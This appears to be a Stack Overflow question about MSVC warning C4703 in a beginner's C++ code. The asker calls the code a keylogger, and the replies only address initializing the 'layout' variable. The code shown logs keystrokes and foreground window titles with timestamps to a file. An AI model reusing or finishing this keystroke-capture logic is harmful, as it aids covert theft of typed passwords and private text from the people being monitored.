# Error C4703 potentially uninitialized local pointer variable 'layout' used

Tags: c++, visual-studio

I am new to C++ and coding and i=this is code which i have borrowed online, and was able to solve other problems except for this one, i think its because of optimization,or some code writing error, please help.

HKL layout, is there.

```
HWND foreground = GetForegroundWindow();
    DWORD threadID;
    HKL layout; // HERE
    if (foreground) {
        //get keyboard layout of the thread
        threadID = GetWindowThreadProcessId(foreground, NULL);
        layout = GetKeyboardLayout(threadID); // HERE
    }

if (foreground)
{
    char window_title[256];
    GetWindowText(foreground, window_title, 256);

    if(strcmp(window_title, lastwindow)!=0) {
        strcpy(lastwindow, window_title);

        // get time
        time_t t = time(NULL);
        struct tm *tm = localtime(&t);
        char s[64];
        strftime(s, sizeof(s), "%c", tm);

        OUTPUT_FILE << "\n\n[Window: "<< window_title << " - at " << s << "] ";
    }
}


std::cout << key_stroke << '\n';

if (key_stroke == VK_BACK)
    OUTPUT_FILE << "[BACKSPACE]";
else if (key_stroke == VK_RETURN)
    OUTPUT_FILE <<  "\n";
else if (key_stroke == VK_SPACE)
    OUTPUT_FILE << " ";
else if (key_stroke == VK_TAB)
    OUTPUT_FILE << "[TAB]";
else if (key_stroke == VK_SHIFT || key_stroke == VK_LSHIFT || key_stroke == VK_RSHIFT)
    OUTPUT_FILE << "[SHIFT]";
else if (key_stroke == VK_CONTROL || key_stroke == VK_LCONTROL || key_stroke == VK_RCONTROL)
    OUTPUT_FILE << "[CONTROL]";
else if (key_stroke == VK_ESCAPE)
    OUTPUT_FILE << "[ESCAPE]";
else if (key_stroke == VK_END)
    OUTPUT_FILE << "[END]";
else if (key_stroke == VK_HOME)
    OUTPUT_FILE << "[HOME]";
else if (key_stroke == VK_LEFT)
    OUTPUT_FILE << "[LEFT]";
else if (key_stroke == VK_UP)
    OUTPUT_FILE << "[UP]";
else if (key_stroke == VK_RIGHT)
    OUTPUT_FILE << "[RIGHT]";
else if (key_stroke == VK_DOWN)
    OUTPUT_FILE << "[DOWN]";
else if (key_stroke == 190 || key_stroke == 110)
    OUTPUT_FILE << ".";
else if (key_stroke == 189 || key_stroke == 109)
    OUTPUT_FILE << "-";
else if (key_stroke == 20)
    OUTPUT_FILE << "[CAPSLOCK]";
else {
    char key;
    // check caps lock
    bool lowercase = ((GetKeyState(VK_CAPITAL) & 0x0001) != 0);

    // check shift key
    if ((GetKeyState(VK_SHIFT) & 0x1000) != 0 || (GetKeyState(VK_LSHIFT) & 0x1000) != 0 || (GetKeyState(VK_RSHIFT) & 0x1000) != 0) {
        lowercase = !lowercase;   
    }

    //map virtual key according to keyboard layout 
    **key = MapVirtualKeyExA(key_stroke, MAPVK_VK_TO_CHAR, layout);**

    //tolower converts it to lowercase properly
    if (!lowercase) key = tolower(key);
    OUTPUT_FILE <<  char(key);
```

help getting solved this code, already defined nullptr, worked but output is showing, in digit, since its my keylogger project its not showing actual keystrokes, just digits.

Comment: Is HKL a typedef ?

Comment: Try `HKL layout{};` instead

Comment: tried this its showing digits in output instead of key strokes.

Comment: Sounds like your next step is to attach a debugger and walk through it

Comment: https://ibb.co/RpDnWW2
https://ibb.co/M9SQX37

Comment: @enrick please don't post pictures of text, instead [edit]  your question and paste your code _there_ as text.

Comment: @enrick imagine what happens if `GetForegroundWindow()` returns `NULL` in  `HWND foreground = GetForegroundWindow();`.

Comment: The warning is accurate, if GetForegroundWindow() fails then you don't have a layout and the value of the variable will be random.  It is not a common failure mode so you are not going to see it when you test.  But it will happen on the user's machine on a rainy day.  Don't keep trundling on with such a major mishap, get out with a return statement or exception.

Comment: I suggest you can try to close the SDL check is: project properties -> configuration properties -> C / C + + -> SDL check(It's not recommended) or initialize the pointer variable to nullptr.

Answer (score 1):

The problem is that layout is only given a value in if. You should add an itializer where it is declared to make the warning go away, or to an else so that the compiler can deduce that it will not be used unititalized.

Comment: is here anyway i can attach screenshot to show output

Comment: This has been answered here: https://meta.stackoverflow.com/questions/268469/why-cant-users-with-less-than-10-reputation-points-add-images-while-asking-ques . You can provide a link to it, if you upload it somewhere.

Comment: Here are two of my screenshots,                                                            https://ibb.co/RpDnWW2
https://ibb.co/M9SQX37